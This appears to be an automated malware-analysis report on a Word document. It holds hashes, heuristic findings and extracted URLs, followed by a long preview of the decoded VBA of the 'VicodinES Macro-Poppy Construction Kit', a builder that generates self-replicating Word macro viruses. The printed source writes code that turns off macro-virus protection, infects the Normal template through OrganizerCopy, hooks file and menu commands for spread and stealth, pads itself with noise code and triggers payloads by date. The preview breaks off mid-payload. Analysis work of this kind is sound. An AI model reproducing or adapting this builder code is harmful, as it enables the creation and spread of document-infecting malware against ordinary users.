Office (OLE) malware analysis — malicious · 49a75429a06c1882

MALICIOUS

Office (OLE)

927.5 KB Created: 2000-05-06 09:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: de1146eec8e609c2ea93dde798d560c2 SHA-1: 4aa3900c7e0a72817d55edc3d6e79480d7b3fb23 SHA-256: 49a75429a06c1882098fcbec473b6ff22f6233b4fd21a09edf2d459d90890ea4

258 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample contains legacy WordBasic macro-virus markers and VBA macros, including AutoOpen and Auto_Close, indicating malicious intent. The document body presents a deceptive End-User License Agreement for a "VicodinES Macro-Poppy Construction Kit" to trick users into enabling macros. The presence of these elements strongly suggests the file is a macro-based malware dropper, likely designed to download and execute further payloads.

Heuristics 8

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Print #hFile, "    .VirusProtection = False"
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
    Print #hFile, "Sub AutoClose()"
```
Heap-spray pattern detected high SC_HEAP_SPRAY

Repeated 0x06 bytes found

Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'push' is 79% of instructions — a sled or padding/filler run, not program logic).
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED

Long run of 0x43 bytes

Disassembly hidden — these bytes score as data, not coherent x86 code (0/1 branch targets land on an instruction boundary (0% coherence)).
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.koam.com In document text (OLE body)
- http://www.sex.seIn document text (OLE body)
- http://www.pipo.com/guillermito/darkweb/virus.html�In document text (OLE body)
- http://www.avp.ch/avpve/�In document text (OLE body)
- http://usa-1.gsd.com.au/freeporn/livevid.htm�In document text (OLE body)
- http://www.avp.ch/avpve/In document text (OLE body)
- http://usa-1.gsd.com.au/freeporn/livevid.htmIn document text (OLE body)
- http://www.pipo.com/guillermito/darkweb/virus.htmlIn document text (OLE body)
- http://www.somewhere.com/test.htmlIn document text (OLE body)
- http://www.vic.net/index.htmlIn document text (OLE body)
- http://www.yahoo.com/News_and_Media/Television/Shows/Cartoons/South_Park/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	225779 bytes
SHA-256: `8e047ede91448e93e08da033596cbb96043b1a366c969dc60bafcd9030d0de32`
Detection ClamAV: Win.Trojan.C-286 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "WelcomeFrm" Attribute VB_Base = "0{B82BFB8D-9023-11D1-9F3B-444553540000}{B82BFA40-9023-11D1-9F3B-444553540000}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Begin1Btn_Click() WelcomeFrm.Hide PoppyStartFrm.Show End Sub Private Sub ExitBtn_Click() ActiveDocument.Close End End Sub Private Sub Image1_Click() MsgBox "No info here but... there are a few hidden hints and bits of information to be found.", vbExclamation, "The Narkotic Network" End Sub Attribute VB_Name = "VMPCK" Public Payload As Integer Public Trigger As Integer Public Noise As Integer Public Stealth As Integer Public Message As Integer Public Skip As Integer Public noname As Integer Public RandomSetting As Integer Public BMonth As Integer Public BDay As Integer Public PDay As Integer Public PMonth As Integer Public vname As String Public xauthor As String Public xsubject As String Public xtitle As String Public xkeywords As String Public xcomments As String Public BGTxt As String Public RMT As String Public HA As String Public URL As String Public ReplaceT As String Public WithT As String Public BG As Boolean Public SE As Boolean Public RM As Boolean Public HAT As Boolean Public NoHead As Boolean Public FSA As Boolean Public EF As Boolean Public AO As Boolean Public AC As Boolean Public AEXIT As Boolean Public AEXEC As Boolean Public FP As Boolean Public FS As Boolean Public FC As Boolean Public FE As Boolean Public TOOL As Boolean Public FN As Boolean Public ROR_X As Boolean Public ID_X As Boolean Public DP_X As Boolean Public PPWeb As Boolean Sub AutoOpen() PMonth = 0 PDay = 0 BMonth = 0 BDay = 0 Skip = 0 Payload = 0 Trigger = 0 Noise = 0 Stealth = 0 Message = 0 noname = 0 WelcomeFrm.Show End Sub Sub BuildPoppy(strFile As String) Dim hFile As Long Randomize VirusName$ = vname rvdie1 = Int(Rnd * 13) + 1 rvdie2 = Int(Rnd * 13) + 1 rvdie3 = Int(Rnd * 13) + 1 rvdie4 = Int(Rnd * 13) + 1 rvdie5 = Int(Rnd * 13) + 1 qran = Int(Rnd * 13) + 1 If rvdie1 = 1 Then sel1$ = "lkasdjf" If rvdie1 = 2 Then sel1$ = "asldifj" If rvdie1 = 3 Then sel1$ = "asdfwqe" If rvdie1 = 4 Then sel1$ = "mplijre" If rvdie1 = 5 Then sel1$ = "erwtjky" If rvdie1 = 6 Then sel1$ = "spavoiu" If rvdie1 = 7 Then sel1$ = "vsoiuwe" If rvdie1 = 8 Then sel1$ = "asfliuv" If rvdie1 = 9 Then sel1$ = "wquwiqn" If rvdie1 = 10 Then sel1$ = "wqeziou" If rvdie1 = 11 Then sel1$ = "wqeiuzv" If rvdie1 = 12 Then sel1$ = "qwzpiuc" If rvdie1 = 13 Then sel1$ = "qppoiuc" If rvdie2 = 1 Then sel2$ = "lkasdf" If rvdie2 = 2 Then sel2$ = "asldij" If rvdie2 = 3 Then sel2$ = "asdfqe" If rvdie2 = 4 Then sel2$ = "mpljre" If rvdie2 = 5 Then sel2$ = "ertjky" If rvdie2 = 6 Then sel2$ = "savoiu" If rvdie2 = 7 Then sel2$ = "vsiuwe" If rvdie2 = 8 Then sel2$ = "asfiuv" If rvdie2 = 9 Then sel2$ = "wquwqn" If rvdie2 = 10 Then sel2$ = "wqezou" If rvdie2 = 11 Then sel2$ = "wqeizv" If rvdie2 = 12 Then sel2$ = "qwziuc" If rvdie2 = 13 Then sel2$ = "qpoiuc" If rvdie3 = 1 Then sel3$ = "lkasswe" If rvdie3 = 2 Then sel3$ = "aswerij" If rvdie3 = 3 Then sel3$ = "asdfwer" If rvdie3 = 4 Then sel3$ = "mpwerre" If rvdie3 = 5 Then sel3$ = "ewerjky" If rvdie3 = 6 Then sel3$ = "savower" If rvdie3 = 7 Then sel3$ = "weriuwe" If rvdie3 = 8 Then sel3$ = "asfrwev" If rvdie3 = 9 Then sel3$ = "wqwerrn" If rvdie3 = 10 Then sel3$ = "wqrtyrt" If rvdie3 = 11 Then sel3$ = "wqrtyzv" If rvdie3 = 12 Then sel3$ = "qzyriuc" If rvdie3 = 13 Then sel3$ = "qrtyrtc" If rvdie4 = 1 Then sel4$ = "yyyyswe" If rvdie4 = 2 Then sel4$ = "sdgerrij" If rvdie4 = 3 Then sel4$ = "asdretr" If rvdie4 = 4 Then sel4$ = "mjtytrre" If rvdie4 = 5 Then sel4$ = "eyuijky" If rvdie4 = 6 Then sel4$ = "styuwer" If rvdie4 = 7 Then sel4$ = "wwqeiuwe" If rvdie4 = 8 Then sel4$ = "aswewev" If rvdie4 = 9 Then sel4$ = "wqwewen" If rvdie4 = 10 Then sel4$ = "wqryuyt" If rvdie4 = 11 Then sel4$ = "wxvcyzv" If rvdie4 = 12 Then sel4$ = "tutrriuc" If rvdie4 = 13 Then sel4$ = "qtrurtc" If rvdie5 = 1 Then sel5$ = "uiterey" If rvdie5 = 2 Then sel5$ = "vailiaq" If rvdie5 = 3 Then sel5$ = "mrewtne" If rvdie5 = 4 Then sel5$ = "viubuxb" If rvdie5 = 5 Then sel5$ = "mmmbibi" If rvdie5 = 6 Then sel5$ = "mopghgj" If rvdie5 = 7 Then sel5$ = "wrwetvz" If rvdie5 = 8 Then sel5$ = "qwertre" If rvdie5 = 9 Then sel5$ = "muytruyt" If rvdie5 = 10 Then sel5$ = "buttchee" If rvdie5 = 11 Then sel5$ = "fuckosd" If rvdie5 = 12 Then sel5$ = "aewpqer" If rvdie5 = 13 Then sel5$ = "myasshole" If qran = 1 Then quote$ = "Bad Ideas for Bad People" If qran = 2 Then quote$ = "Christianity is Nothing More Than a Poorly Thought-out Moral Safety Net" If qran = 3 Then quote$ = "Social Camouflage for This Modern Age" If qran = 4 Then quote$ = "Live for Now" If qran = 5 Then quote$ = "Pain, everyday..." If qran = 6 Then quote$ = "Hurt, everything..." If qran = 7 Then quote$ = "Loveless, all" If qran = 8 Then quote$ = "Forever Never Happens" If qran = 9 Then quote$ = "Mortality is Pure Evil" If qran = 10 Then quote$ = "Let the dog die" If qran = 11 Then quote$ = "Mentally out of service" If qran = 12 Then quote$ = "Give me DRUGS!" If qran = 13 Then quote$ = "Daddy's got a big o'l bag-a-chicken" id1 = Int(Rnd * 9999) id2 = Int(Rnd * 9999) ID3 = id1 - id2 spam1 = Int(Rnd * 9999) spam2 = Int(Rnd * 9999) msfile$ = "f" & spam2 & "$" sel5$ = sel5$ & id1 sel4$ = sel4$ & id2 sel3$ = sel3$ & id1 & id2 sel2$ = sel2$ & id2 & id1 sel1$ = sel1$ & spam1 & id1 pload$ = "p" & spam1 ' Begin Write MacPoppy hFile = FreeFile Open strFile For Output Access Write As hFile ' Header and Start Of Virus Sub Print #hFile, "Attribute VB_Name = """ + VirusName$ + """ " ' Set F\|N Skip Trigger If FN = True Then Print #hFile, " " Print #hFile, "Public Skip As Integer" Print #hFile, " " End If Print #hFile, " " Print #hFile, "Sub " + VirusName$ + "()" If NoHead = False Then Print #hFile, " " Print #hFile, " 'Produced by The VicodinES Macro.Poppy Construction Kit" Print #hFile, " '======================================================" Print #hFile, " 'Code Written by VicodinES """ + quote$ + """" Print #hFile, " 'Poppy ID : " & id1 & id2 & ID3 Print #hFile, " " Print #hFile, " " End If Print #hFile, "On Error Resume Next" If RM = True Or Trigger = 2 Then Print #hFile, "Randomize" End If Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") ' Click The Basics Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "With Options" Print #hFile, " .ConfirmConversions = False" Print #hFile, " .VirusProtection = False" Print #hFile, " .SaveNormalPrompt = False" Print #hFile, "End With" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "ActiveDocument.ReadOnlyRecommended = False" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") ' Do random number payload check If Trigger = 2 Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "check = Int(Rnd * " & RandomSetting & ")" Print #hFile, "If check = 3 then Call " + pload$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") End If If RM = True Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "rm = Int(Rnd * 100)" Print #hFile, " If rm = 99 Then MsgBox """ & RMT & """,vbSystemModal" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") End If ' If payload is Day/Date then set If Trigger = 1 Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If PDay = 100 Then Print #hFile, "If Month(Now()) = " & PMonth & " Then Call " + pload$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If PMonth = 100 Then Print #hFile, "If Day(Now()) = " & PDay & " Then Call " + pload$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If PDay < 100 And PMonth < 100 Then Print #hFile, "If Month(Now()) = " & PMonth & " And Day(Now()) = " & PDay & " Then Call " + pload$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") End If ' Check if B-Day Greeting If BG = True Then Print #hFile, "If Month(Now()) = " & BMonth & " And Day(Now()) = " & BDay & " Then MsgBox """ & BGTxt & """,vbinformation, ""Birthday Greeting!!!""" ' Set The Document Properties If DP_X = True Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "With Dialogs(wdDialogFileSummaryInfo)" If DP_X = True And xauthor <> "" Then Print #hFile, " .Author = """ & xauthor & """" If DP_X = True And xtitle <> "" Then Print #hFile, " .Title = """ & xtitle & """" If DP_X = True And xsubject <> "" Then Print #hFile, " .Subject = """ & xsubject & """" If DP_X = True And xcomments <> "" Then Print #hFile, " .Comments = """ & xcomments & """" If DP_X = True And xkeywords <> "" Then Print #hFile, " .Keywords = """ & xkeywords & """" Print #hFile, " .Execute" Print #hFile, "End With" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") End If ' Start of Infection Routine Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, sel2$ & rvdie3 & " = 0" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "set " & sel3$ & rvdie2 & " = MacroContainer" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") ' Check Read-Only Remover Status If ROR_X = True Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " " + msfile$ + " = ""c:\windows\startm~1\programs\startup\msfile.bat""" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, sel1$ + " = GetAttr(NormalTemplate.FullName)" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "If " + sel1$ + " = vbReadOnly Then Call vBitchES(" + msfile$ + ")" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "If " + sel1$ + " = vbReadOnly + vbArchive Then Call vBitchES(" + msfile$ + ")" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "If " + sel1$ + " = vbReadOnly Then GoTo fuckoff" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "If " + sel1$ + " = vbReadOnly + vbArchive Then GoTo fuckoff" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") End If ' Continue Infection Routine Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "If " + sel3$ & rvdie2 & " = NormalTemplate Then " + sel2$ & rvdie3 & " = 1" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "If " + sel2$ & rvdie3 & " = 1 Then " + sel4$ & rvdie1 & " = NormalTemplate.FullName Else " + sel4$ & rvdie1 & " = ActiveDocument.FullName" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "If " + sel2$ & rvdie3 & " = 1 Then " + sel5$ & rvdie4 & " = ActiveDocument.FullName Else " + sel5$ & rvdie4 & " = NormalTemplate.FullName" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Application.OrganizerCopy Source:=" + sel4$ & rvdie1 & ", Destination:=" + sel5$ & rvdie4 & ", Name:=""" + VirusName$ + """, Object:=wdOrganizerObjectProjectItems" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If FN = True Then Print #hFile, "If " + sel2$ & rvdie3 & " = 1 and Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName" End If If FN = False Then Print #hFile, "If " + sel2$ & rvdie3 & " = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName" End If Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "If " + sel2$ & rvdie3 & " = 0 Then" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " End If" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") ' Icon Disco Call If ID_X = True Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call dhIconDisco(""C:\autorun.inf"")" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") End If ' The End of Infection Routine Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "fuckoff:" Print #hFile, "End Sub" ' Build H\|A Message Hook If HAT = True Then Print #hFile, "Sub HelpAbout()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " MsgBox """ & HA & """,vbInformation" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build F\|N Hook If FN = True Then Print #hFile, "Sub FileNew()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Dialogs(wdDialogFileNew).Show" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Skip = 1" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build F\|S Hook If FS = True Then Print #hFile, "Sub FileSave()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " ActiveDocument.Save" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build F\|C Hook If FC = True Then Print #hFile, "Sub FileClose()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " If ActiveDocument.Saved = False Then ActiveDocument.Save" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " ActiveDocument.Close" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If If TOOL = True Then Print #hFile, "Sub ToolsOptions()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Dialogs(wdDialogToolsOptions).Show" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If If EF = True Then Print #hFile, "Sub EditFind()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Dialogs(wdDialogEditFind).Show" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If If FSA = True Then Print #hFile, "Sub FileSaveAs()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Dialogs(wdDialogFileSaveAs).Show" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build F\|C Hook If FP = True Then Print #hFile, "Sub FilePrint()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Dialogs (wdDialogFilePrint).Show " Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build F\|E Hook If FE = True Then Print #hFile, "Sub FileExit()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " If ActiveDocument.Saved = False Then ActiveDocument.Save" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Application.Quit" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build AutoOpen Hook If AO = True Then Print #hFile, "Sub AutoOpen()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build AutoExit Hook If AEXIT = True Then Print #hFile, "Sub AutoExit()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build AutoExec Hook If AEXEC = True Then Print #hFile, "Sub AutoExec()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build AutoClose Hook If AC = True Then Print #hFile, "Sub AutoClose()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build Stealth Hooks If Stealth > 0 Or Trigger = 3 Then Print #hFile, "Sub ToolsMacro()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If Stealth > 1 Then Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If Trigger = 3 Then Print #hFile, " Call " + pload$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If SE = True Then Print #hFile, "MsgBox ""Word Basic Err =7""" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If If Stealth > 0 Or Trigger = 3 Then Print #hFile, "Sub FileTemplates()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If Stealth > 1 Then Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If Trigger = 3 Then Print #hFile, " Call " + pload$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If SE = True Then Print #hFile, "MsgBox ""Word Basic Err =7""" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If If Stealth > 0 Or Trigger = 3 Then Print #hFile, "Sub ViewVBCode()" Print #hFile, " On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If Stealth > 1 Then Print #hFile, " Call " + VirusName$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If Trigger = 3 Then Print #hFile, " Call " + pload$ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") If SE = True Then Print #hFile, "MsgBox ""Word Basic Err =7""" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If ' Build Payload If Trigger > 0 Then Print #hFile, "Sub " & pload$ & "()" Print #hFile, " On Error Resume Next" If Payload = 1 Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " ActiveDocument.FollowHyperlink Address:= _" Print #hFile, """" & URL & """ _" Print #hFile, " , NewWindow:=False, AddHistory:=True" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") End If If Payload = 2 Then 